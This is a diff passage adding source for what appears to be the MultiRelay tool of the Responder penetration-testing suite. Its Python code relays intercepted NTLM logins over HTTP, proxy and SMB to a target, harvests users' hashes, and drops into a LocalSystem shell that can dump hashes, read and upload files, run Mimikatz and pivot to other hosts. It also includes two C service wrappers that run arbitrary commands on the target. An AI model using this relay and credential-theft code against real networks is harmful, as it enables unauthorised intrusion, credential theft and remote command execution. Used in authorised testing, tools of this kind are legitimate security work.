+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+            ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
+            if NTLM_Auth:
+                #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
+                Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+                if Packet_NTLM == "\x01":
+                    ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+                    h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+                    n = SMBNegoCairo(Data = SMBNegoCairoData())
+                    n.calculate()
+                    packet0 = str(h)+str(n)
+                    buffer0 = longueur(packet0)+packet0
+                    s.send(buffer0)
+                    smbdata = s.recv(2048)
+                    ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                    if smbdata[8:10] == "\x72\x00":
+                        head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+                        t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                        t.calculate()
+                        packet1 = str(head)+str(t)
+                        buffer1 = longueur(packet1)+packet1
+                        s.send(NetworkSendBufferPython2or3(buffer1))
+                        smbdata = s.recv(2048) #got it here.
+
+                    ## Send HTTP Response.
+                    Buffer_Ans = IIS_NTLM_Challenge_Ans()
+                    Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                    key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+                    self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+                    data = self.request.recv(8092)
+                    NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                    Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+                    ##Got NTLM Message 3 from client.
+                    if Packet_NTLM == "\x03":
+                        NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                    ##Might be anonymous, verify it and if so, send no go to client.
+                    if IsSMBAnonymous(NTLM_Auth):
+                        Response = IIS_Auth_401_Ans()
+                        self.request.send(str(Response))
+                        data = self.request.recv(8092)
+                    else:
+                        #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                        #and has not attempted before. While at it, let's grab his hash.
+                        Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+
+                        if Username is not None:
+                            head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                            t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                            t.calculate()
+                            packet1 = str(head)+str(t)
+                            buffer1 = longueur(packet1)+packet1
+                            print("[+] SMB Session Auth sent.")
+                            s.send(NetworkSendBufferPython2or3(buffer1))
+                            smbdata = s.recv(2048)
+                            RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                            if RunCmd is None:
+                                s.close()
+                                self.request.close()
+                                return None
+
+            else:
+                ##Any other type of request, send a 401.
+                Response = IIS_Auth_401_Ans()
+                self.request.send(str(Response))
+
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+class SMBRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+        except:
+            raise
+
+        try:
+            s = ConnectToTarget()
+
+            data = self.request.recv(8092)
+
+            ##Negotiate proto answer. That's us.
+            if data[8:10] == b'\x72\x00':
+                Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
+                Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+                packet1 = str(Header)+str(Body)
+                Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+                self.request.send(NetworkSendBufferPython2or3(Buffer))
+                data = self.request.recv(4096)
+
+            ## Make sure it's not a Kerberos auth.
+            if data.find(b'NTLM') != -1:
+                ## Start with nego protocol + session setup negotiate to our target.
+                data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
+
+                ## Make sure it's not a Kerberos auth.
+            if data.find(b'NTLM') != -1:
+            ##Relay all that to our client.
+                if data[8:10] == b'\x73\x00':
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                    #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
+                    #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
+                    t = smbdata[36:].decode('latin-1')
+                    packet0 = str(head)+str(t)
+                    buffer0 = longueur(packet0)+packet0
+                    self.request.send(NetworkSendBufferPython2or3(buffer0))
+                    data = self.request.recv(4096)
+            else:
+                #if it's kerberos, ditch the connection.
+                s.close()
+                return None
+
+            if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
+                ##Send logon failure for anonymous logins.
+                head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                t = SMBSessEmpty()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1
+                self.request.send(NetworkSendBufferPython2or3(buffer1))
+                s.close()
+                return None
+
+            else:
+                #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                #and has not attempted before. While at it, let's grab his hash.
+                Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
+                if Username is not None:
+                    ##Got the ntlm message 3, send it over to SMB.
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
+                    t = data[36:].decode('latin-1')#Final relay.
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    if Pivoting[0] == "1":
+                        pass
+                    else:
+                        print("[+] SMB Session Auth sent.")
+                    s.send(NetworkSendBufferPython2or3(buffer1))
+                    smbdata = s.recv(4096)
+                    #We're all set, dropping into shell.
+                    RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                    #If runcmd is None it's because tree connect was denied for this user.
+                    #This will only happen once with that specific user account.
+                    #Let's kill that connection so we can force him to reauth with another account.
+                    if RunCmd is None:
+                        s.close()
+                        return None
+
+                else:
+                    ##Send logon failure, so our client might authenticate with another account.
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                    t = SMBSessEmpty()
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    self.request.send(NetworkSendBufferPython2or3(buffer1))
+                    data = self.request.recv(4096)
+                    self.request.close()
+                    return None
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+
+#Interface starts here.
+def RunShellCmd(data, s, clientIP, Target, Username, Domain):
+
+    #Let's declare our globals here..
+    #Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
+    global Pivoting
+    #Update Host, when pivoting is used.
+    global Host
+    #Make sure we don't open 2 shell at the same time..
+    global ShellOpen
+    ShellOpen = ["Shell is open"]
+
+    # On this block we do some verifications before dropping the user into the shell.
+    if data[8:10] == b'\x73\x6d':
+        print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
+        print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    if data[8:10] == b'\x73\x8d':
+        print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    if data[8:10] == b'\x73\x5e':
+        print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
+        del ShellOpen[:]
+        return False
+
+    ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
+    ## Tree Connect
+    if data[8:10] == b'\x73\x00':
+        GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+        t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
+        t.calculate()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1
+        s.send(NetworkSendBufferPython2or3(buffer1))
+        data = s.recv(2048)
+
+    ## Nope he doesn't.
+    if data[8:10] == b'\x75\x22':
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+            Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
+    if data[8:10] == b'\x75\xcc':
+        print("[+] Tree Connect AndX denied. Bad Network Name returned.")
+        del ShellOpen[:]
+        return False
+
+    ## Tree Connect on C$ is successfull.
+    if data[8:10] == b'\x75\x00':
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Looks good, "+Username+" has admin rights on C$.")
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+        t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
+        t.calculate()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1
+        s.send(NetworkSendBufferPython2or3(buffer1))
+        data = s.recv(2048)
+
+    ## Run one command.
+    if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
+        print("[+] Authenticated.")
+        if OneCommand != None:
+            print("[+] Running command: %s"%(OneCommand))
+            RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
+        if Dump:
+            print("[+] Dumping hashes")
+            DumpHashes(data, s, Target[0])
+        os._exit(1)
+
+    ## Drop into the shell.
+    if data[8:10] == b'\x75\x00' and OneCommand == None:
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
+            ShowHelp()
+        Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
+        print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
+
+    while True:
+
+        ## We either just arrived here or we're back from a command operation, let's setup some stuff.
+        if data[8:10] == b'\x75\x00':
+        #start a thread for raw_input, so we can do other stuff while we wait for a command.
+            t = Thread(target=get_command, args=())
+            t.daemon = True
+            t.start()
+
+            #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
+            #to maintain MultiRelay alive and well.
+            count = 0
+            DoEvery = random.randint(10, 45)
+            while any(x in Cmd for x in Cmd) is False:
+                count = count+1
+                SMBKeepAlive(s, data)
+                if count == DoEvery:
+                    DumbSMBChain(data, s, Target[0])
+                    count = 0
+                if any(x in Cmd for x in Cmd) is True:
+                    break
+
+            ##Grab the commands. Cmd is global in get_command().
+            DumpReg = re.findall('^dump', Cmd[0])
+            Read    = re.findall('^read (.*)$', Cmd[0])
+            RegDump = re.findall('^regdump (.*)$', Cmd[0])
+            Get     = re.findall('^get (.*)$', Cmd[0])
+            Upload  = re.findall('^upload (.*)$', Cmd[0])
+            Delete  = re.findall('^delete (.*)$', Cmd[0])
+            RunAs   = re.findall('^runas (.*)$', Cmd[0])
+            LCmd    = re.findall('^lcmd (.*)$', Cmd[0])
+            Mimi    = re.findall('^mimi (.*)$', Cmd[0])
+            Mimi32  = re.findall('^mimi32 (.*)$', Cmd[0])
+            Scan    = re.findall('^scan (.*)$', Cmd[0])
+            Pivot   = re.findall('^pivot (.*)$', Cmd[0])
+            Help    = re.findall('^help', Cmd[0])
+
+            if Cmd[0] == "exit":
+                print("[+] Returning in relay mode.")
+                del Cmd[:]
+                del ShellOpen[:]
+                return None
+
+            ##For all of the following commands we send the data (var: data) returned by the
+            ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
+            ##We also clean up the command array when done.
+            if DumpReg:
+                data = DumpHashes(data, s, Target[0])
+                del Cmd[:]
+
+            if Read:
+                File = Read[0]
+                data = ReadFile(data, s, File, Target[0])
+                del Cmd[:]
+
+            if Get:
+                File = Get[0]
+                data = GetAfFile(data, s, File, Target[0])
+                del Cmd[:]
+
+            if Upload:
+                File = Upload[0]
+                if os.path.isfile(File):
+                    FileSize, FileContent = UploadContent(File)
+                    File = os.path.basename(File)
+                    data = WriteFile(data, s, File,  FileSize, FileContent, Target[0])
+                    del Cmd[:]
+                else:
+                    print(File+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Delete:
+                Filename = Delete[0]
+                data = DeleteFile(data, s, Filename, Target[0])
+                del Cmd[:]
+
+            if RegDump:
+                Key = RegDump[0]
+                data = SaveAKey(data, s, Target[0], Key)
+                del Cmd[:]
+
+            if RunAs:
+                if os.path.isfile(RunAsFileName):
+                    FileSize, FileContent = UploadContent(RunAsFileName)
+                    FileName = os.path.basename(RunAsFileName)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = RunAs[0]
+                    data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
+                    del Cmd[:]
+                else:
+                    print(RunAsFileName+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if LCmd:
+                subprocess.call(LCmd[0], shell=True)
+                del Cmd[:]
+
+            if Mimi:
+                if os.path.isfile(MimikatzFilename):
+                    FileSize, FileContent = UploadContent(MimikatzFilename)
+                    FileName = os.path.basename(MimikatzFilename)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = Mimi[0]
+                    data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+                    del Cmd[:]
+                else:
+                    print(MimikatzFilename+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Mimi32:
+                if os.path.isfile(Mimikatzx86Filename):
+                    FileSize, FileContent = UploadContent(Mimikatzx86Filename)
+                    FileName = os.path.basename(Mimikatzx86Filename)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = Mimi32[0]
+                    data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+                    del Cmd[:]
+                else:
+                    print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Pivot:
+                if Pivot[0] == Target[0]:
+                    print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
+                    del Pivot[:]
+                    del Cmd[:]
+                else:
+                    if ShowSigning(Pivot[0]):
+                        del Pivot[:]
+                        del Cmd[:]
+                    else:
+                        if os.path.isfile(RunAsFileName):
+                            FileSize, FileContent = UploadContent(RunAsFileName)
+                            FileName = os.path.basename(RunAsFileName)
+                            data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                            RunAsPath = '%windir%\\Temp\\'+FileName
+                            Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
+
+                            if Status == True:
+                                print("[+] Pivoting to %s."%(Pivot[0]))
+                                if os.path.isfile(RunAsFileName):
+                                    FileSize, FileContent = UploadContent(RunAsFileName)
+                                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                                    #shell will close.
+                                    del ShellOpen[:]
+                                    #update the new host.
+                                    Host = [Pivot[0]]
+                                    #we're in pivoting mode.
+                                    Pivoting = ["1"]
+                                    data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
+                                    del Cmd[:]
+                                    s.close()
+                                    return None
+
+                            if Status == False:
+                                print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
+                                del Cmd[:]
+                                del Pivot[:]
+                        else:
+                            print(RunAsFileName+" does not exist, please specify a valid file.")
+                            del Cmd[:]
+
+            if Scan:
+                LocalIp = FindLocalIp()
+                Range = ConvertToClassC(Target[0], Scan[0])
+                RunPivotScan(Range, Target[0])
+                del Cmd[:]
+
+            if Help:
+                ShowHelp()
+                del Cmd[:]
+
+            ##Let go with the command.
+            if any(x in Cmd for x in Cmd):
+                if len(Cmd[0]) > 1:
+                    if os.path.isfile(SysSVCFileName):
+                        FileSize, FileContent = UploadContent(SysSVCFileName)
+                        FileName = os.path.basename(SysSVCFileName)
+                        RunPath = '%windir%\\Temp\\'+FileName
+                        data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                        data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
+                        del Cmd[:]
+                    else:
+                        print(SysSVCFileName+" does not exist, please specify a valid file.")
+                        del Cmd[:]
+        if isinstance(data, str):
+           data = data.encode('latin-1')
+        if data is None:
+            print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
+
+        if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
+            head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+            t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
+            t.calculate()
+            packet1 = str(head)+str(t)
+            buffer1 = longueur(packet1)+packet1
+            s.send(NetworkSendBufferPython2or3(buffer1))
+            data = s.recv(2048)
+
+class ThreadingTCPServer(TCPServer):
+    def server_bind(self):
+        TCPServer.server_bind(self)
+
+ThreadingTCPServer.allow_reuse_address = 1
+ThreadingTCPServer.daemon_threads = True
+
+def serve_thread_tcp(host, port, handler):
+    try:
+        server = ThreadingTCPServer((host, port), handler)
+        server.serve_forever()
+    except:
+        print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
+
+def main():
+    try:
+        threads = []
+        threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
+        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
+        threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
+        if ExtraPort != 0:
+            threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
+        for thread in threads:
+            thread.setDaemon(True)
+            thread.start()
+
+        while True:
+            time.sleep(1)
+
+    except (KeyboardInterrupt, SystemExit):
+        ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
+        ##This is a bug in python readline when dealing with raw_input()..
+        if ShellOpen:
+            os.system('stty sane')
+        ##Then exit
+        sys.exit("\rExiting...")
+
+if __name__ == '__main__':
+    main()

tools/MultiRelay/bin/Runas.c

@@ -0,0 +1,100 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+#include <userenv.h>
+#include <wtsapi32.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	HANDLE hUser;
+	LPVOID env;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+			if(WTSQueryUserToken(WTSGetActiveConsoleSessionId(), &hUser))
+			{
+				if(CreateEnvironmentBlock(&env, hUser, FALSE))
+				{
+					if(CreateProcessAsUser(hUser, NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi))
+					{
+						CloseHandle(pi.hThread);
+						CloseHandle(pi.hProcess);
+					}
+					DestroyEnvironmentBlock(env);
+				}
+				CloseHandle(hUser);
+			}
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}

tools/MultiRelay/bin/Syssvc.c

@@ -0,0 +1,90 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+
+			if(CreateProcess(NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+			{
+				CloseHandle(pi.hThread);
+				CloseHandle(pi.hProcess);
+			}
+
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}

tools/MultiRelay/impacket-dev/LICENSE

@@ -0,0 +1,84 @@
+Licencing
+---------
+
+We provide this software under a slightly modified version of the
+Apache Software License. The only changes to the document were the
+replacement of "Apache" with "Impacket" and "Apache Software Foundation"
+with "SecureAuth Corporation". Feel free to compare the resulting
+document to the official Apache license.
+
+The `Apache Software License' is an Open Source Initiative Approved
+License.
+
+
+The Apache Software License, Version 1.1
+Modifications by SecureAuth Corporation (see above)
+
+Copyright (c) 2000 The Apache Software Foundation.  All rights
+reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in
+   the documentation and/or other materials provided with the
+   distribution.
+
+3. The end-user documentation included with the redistribution,
+   if any, must include the following acknowledgment:
+      "This product includes software developed by
+       SecureAuth Corporation (https://www.secureauth.com/)."
+   Alternately, this acknowledgment may appear in the software itself,
+   if and wherever such third-party acknowledgments normally appear.
+
+4. The names "Impacket", "SecureAuth Corporation" must
+   not be used to endorse or promote products derived from this
+   software without prior written permission. For written
+   permission, please contact oss@secureauth.com.
+
+5. Products derived from this software may not be called "Impacket",
+   nor may "Impacket" appear in their name, without prior written
+   permission of SecureAuth Corporation.
+
+THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
